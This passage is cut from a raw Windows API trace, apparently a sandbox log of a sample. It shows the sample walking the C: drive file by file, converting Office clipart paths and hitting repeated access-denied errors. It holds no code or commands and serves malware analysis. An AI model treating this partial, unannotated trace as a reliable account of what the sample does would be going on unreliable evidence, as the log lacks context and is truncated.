lpUsedDefaultChar=0x0) returned 69 [0104.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0093905.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0093905.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0098497.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0098497.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099145.JPG", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099145.JPG", lpUsedDefaultChar=0x0) returned 69 [0104.644] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099146.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099146.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.644] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099147.JPG", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099147.JPG", lpUsedDefaultChar=0x0) returned 69 [0104.645] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099148.JPG", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099148.JPG", lpUsedDefaultChar=0x0) returned 69 [0104.645] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099149.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099149.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099150.JPG", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099150.JPG", lpUsedDefaultChar=0x0) returned 69 [0104.647] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099151.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099151.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.647] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099152.JPG", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099152.JPG", lpUsedDefaultChar=0x0) returned 69 [0104.647] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099153.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099153.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.647] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099154.JPG", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099154.JPG", lpUsedDefaultChar=0x0) returned 69 [0104.647] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099155.JPG", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099155.JPG", lpUsedDefaultChar=0x0) returned 69 [0104.648] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099156.JPG", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099156.JPG", lpUsedDefaultChar=0x0) returned 69 [0104.648] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099157.JPG", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099157.JPG", lpUsedDefaultChar=0x0) returned 69 [0104.648] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099158.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099158.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.648] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099159.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099159.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.649] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099160.JPG", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099160.JPG", lpUsedDefaultChar=0x0) returned 69 [0104.649] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099161.JPG", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099161.JPG", lpUsedDefaultChar=0x0) returned 69 [0104.649] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099162.JPG", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099162.JPG", lpUsedDefaultChar=0x0) returned 69 [0104.649] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099163.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099163.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.649] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099164.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099164.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.650] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099165.JPG", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099165.JPG", lpUsedDefaultChar=0x0) returned 69 [0104.650] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099166.JPG", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099166.JPG", lpUsedDefaultChar=0x0) returned 69 [0104.650] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099167.JPG", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099167.JPG", lpUsedDefaultChar=0x0) returned 69 [0104.651] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099168.JPG", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099168.JPG", lpUsedDefaultChar=0x0) returned 69 [0104.651] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099169.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099169.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.652] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099170.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099170.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.652] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099171.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099171.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.653] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099172.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099172.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.653] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099173.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099173.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.653] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099174.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099174.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.653] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099175.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099175.WMF", lpUsedDefaultChar=0x0) returned 69 [0121.237] GetFileType (hFile=0x250) returned 0x1 [0121.237] CloseHandle (hObject=0x250) returned 1 [0129.549] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x77492ec4, ftCreationTime.dwHighDateTime=0x1d1a04d, ftLastAccessTime.dwLowDateTime=0xaa0df02e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x774b901c, ftLastWriteTime.dwHighDateTime=0x1d1a04d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.549] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77492ec4, ftCreationTime.dwHighDateTime=0x1d1a04d, ftLastAccessTime.dwLowDateTime=0x77492ec4, ftLastAccessTime.dwHighDateTime=0x1d1a04d, ftLastWriteTime.dwLowDateTime=0x77492ec4, ftLastWriteTime.dwHighDateTime=0x1d1a04d, nFileSizeHigh=0x0, nFileSizeLow=0xf4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Money_LogoSmall.scale-100.png", cAlternateFileName="")) returned 1 [0133.696] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x351bdfd6, ftCreationTime.dwHighDateTime=0x1d2a059, ftLastAccessTime.dwLowDateTime=0xacad2aaa, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x35256944, ftLastWriteTime.dwHighDateTime=0x1d2a059, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0133.696] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x351bdfd6, ftCreationTime.dwHighDateTime=0x1d2a059, ftLastAccessTime.dwLowDateTime=0x351bdfd6, ftLastAccessTime.dwHighDateTime=0x1d2a059, ftLastWriteTime.dwLowDateTime=0x351bdfd6, ftLastWriteTime.dwHighDateTime=0x1d2a059, nFileSizeHigh=0x0, nFileSizeLow=0x7d1, dwReserved0=0x0, dwReserved1=0x0, cFileName="autosolve_button_over.mobile.png", cAlternateFileName="")) returned 1 [0133.696] AreFileApisANSI () returned 1 [0153.615] GetFileType (hFile=0x2ac) returned 0x1 [0153.615] CloseHandle (hObject=0x2ac) returned 1 [0189.760] GetFileType (hFile=0x250) returned 0x1 [0189.761] CloseHandle (hObject=0x250) returned 1 [0208.073] GetFileType (hFile=0x420) returned 0x1 [0219.324] FindNextFileW (in: hFindFile=0x78590, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17dc65cf, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xdecc2d42, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b2a1d79, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0219.326] FindNextFileW (in: hFindFile=0x78590, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34dc45f8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x34dc45f8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x34dc45f8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x362c, dwReserved0=0x0, dwReserved1=0x0, cFileName="CL_Utility.ps1", cAlternateFileName="")) returned 1 [0219.327] AreFileApisANSI () returned 1 [0219.875] GetLastError () returned 0x5 [0219.875] GetLastError () returned 0x5 [0219.878] GetLastError () returned 0x5 [0219.878] GetLastError () returned 0x5 [0219.881] GetLastError () returned 0x5 [0219.881] GetLastError () returned 0x5 [0219.883] GetLastError () returned 0x5 [0219.883] GetLastError () returned 0x5 [0219.885] GetLastError () returned 0x5 [0219.885] GetLastError () returned 0x5 [0219.886] GetLastError () returned 0x5 [0219.886] GetLastError () returned 0x5 [0219.889] GetLastError () returned 0x5 [0219.889] GetLastError () returned 0x5 [0219.891] GetLastError () returned 0x5 [0219.891] GetLastError () returned 0x5 [0219.891] GetLastError () returned 0x5 [0219.891] GetLastError () returned 0x5 [0219.893] GetLastError () returned 0x5 [0219.893] GetLastError () returned 0x5 [0233.141] GetLastError () returned 0x5 [0233.141] GetLastError () returned 0x5 [0246.352] GetLastError () returned 0x5 [0246.352] GetLastError () returned 0x5 [0246.353] SetLastError (dwErrCode=0x5) [0246.353] GetLastError () returned 0x5 [0246.354] SetLastError (dwErrCode=0x5) [0246.354] GetLastError () returned 0x5 [0246.354] SetLastError (dwErrCode=0x5) [0246.355] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f85a840, ftCreationTime.dwHighDateTime=0x1d2a059, ftLastAccessTime.dwLowDateTime=0x7f85a840, ftLastAccessTime.dwHighDateTime=0x1d2a059, ftLastWriteTime.dwLowDateTime=0x7f85a840, ftLastWriteTime.dwHighDateTime=0x1d2a059, nFileSizeHigh=0x0, nFileSizeLow=0x429, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="GetStartedAppList.targetsize-96_contrast-black.png", cAlternateFileName="")) returned 1 [0246.356] AreFileApisANSI () returned 1 [0246.376] GetLastError () returned 0x5 [0246.376] GetLastError () returned 0x5 [0247.012] GetLastError () returned 0x5 [0247.012] GetLastError () returned 0x5 [0247.016] GetLastError () returned 0x5 [0247.016] GetLastError () returned 0x5 [0247.020] GetLastError () returned 0x5 [0247.020] GetLastError () returned 0x5 [0247.023] GetLastError () returned 0x5 [0247.023] GetLastError () returned 0x5 [0247.024] GetLastError () returned 0x5 [0247.024] GetLastError () returned 0x5 [0247.024] GetLastError () returned 0x5 [0247.025] GetLastError () returned 0x5 [0247.025] GetLastError () returned 0x5 [0247.025] GetLastError () returned 0x5 [0247.026] GetLastError () returned 0x5 [0247.026] GetLastError () returned 0x5 [0247.027] GetLastError () returned 0x5 [0247.027] GetLastError () returned 0x5 [0247.027] GetLastError () returned 0x5 [0247.027] GetLastError () returned 0x5 [0247.028] GetLastError () returned 0x5 [0247.028] GetLastError () returned 0x5 [0247.029] GetLastError () returned 0x5 [0247.029] GetLastError () returned 0x5 [0247.030] GetLastError () returned 0x5 [0247.030] GetLastError () returned 0x5 [0247.031] GetLastError () returned 0x5 [0247.031] GetLastError () returned 0x5 [0247.032] GetLastError () returned 0x5 [0247.032] GetLastError () returned 0x5 [0247.033] GetLastError () returned 0x5 [0247.033] GetLastError () returned 0x5 [0247.033] GetLastError () returned 0x5 [0247.033] GetLastError () returned 0x5 [0247.034] GetLastError () returned 0x5 [0247.034] GetLastError () returned 0x5 [0247.035] GetLastError () returned 0x5 [0247.035] GetLastError () returned 0x5 [0247.036] GetLastError () returned 0x5 [0247.036] GetLastError () returned 0x5 [0247.036] GetLastError () returned 0x5 [0247.037] GetLastError () returned 0x5 [0247.037] GetLastError () returned 0x5 [0247.037] GetLastError () returned 0x5 [0247.219] GetLastError () returned 0x5 [0247.219] GetLastError () returned 0x5 [0247.220] GetLastError () returned 0x5 [0247.220] GetLastError () returned 0x5 [0247.221] GetLastError () returned 0x5 [0247.221] GetLastError () returned 0x5 [0247.221] GetLastError () returned 0x5 [0247.221] GetLastError () returned 0x5 [0247.222] GetLastError () returned 0x5 [0247.222] GetLastError () returned 0x5 [0247.223] GetLastError () returned 0x5 [0247.223] GetLastError () returned 0x5 [0247.224] GetLastError () returned 0x5 [0247.224] GetLastError () returned 0x5 [0247.225] GetLastError () returned 0x5 [0247.225] GetLastError () returned 0x5 [0247.225] GetLastError () returned 0x5 [0247.225] GetLastError () returned 0x5 [0247.229] GetLastError () returned 0x5 [0247.229] GetLastError () returned 0x5 [0247.238] GetLastError () returned 0x5 [0247.238] GetLastError () returned 0x5 [0247.239] GetLastError () returned 0x5 [0247.239] GetLastError () returned 0x5 [0247.240] GetLastError () returned 0x5 [0247.240] GetLastError () returned 0x5 [0247.241] GetLastError () returned 0x5 [0247.241] GetLastError () returned 0x5 [0247.810] GetLastError () returned 0x5 [0247.810] GetLastError () returned 0x5 Thread: id = 35 os_tid = 0x8d0 [0059.545] GetLastError () returned 0x57 [0059.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0x364) returned 0x66980 [0059.549] SetLastError (dwErrCode=0x57) [0059.549] AreFileApisANSI () returned 1 [0059.549] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f9ac, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr="C:\\") returned 4 [0059.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf30 [0059.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f608 [0059.549] FindFirstFileExW (in: lpFileName="C:\\\\*", fInfoLevelId=0x0, lpFindFileData=0x327f1fc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327f1fc) returned 0x78850 [0059.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0059.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x884c8 [0059.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0059.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0059.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0059.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x884c8 | out: hHeap=0x20000) returned 1 [0059.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0059.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0059.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0059.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x76ee0 [0059.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886f8 [0059.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x77030 [0059.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0059.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0059.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f648 [0059.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0059.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f648 | out: hHeap=0x20000) returned 1 [0059.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0059.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0059.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0059.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0059.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0059.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0059.551] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.551] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.551] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.551] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x884c8 [0059.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0059.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0059.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x76380 [0059.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0059.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x772d0 [0059.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0059.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, 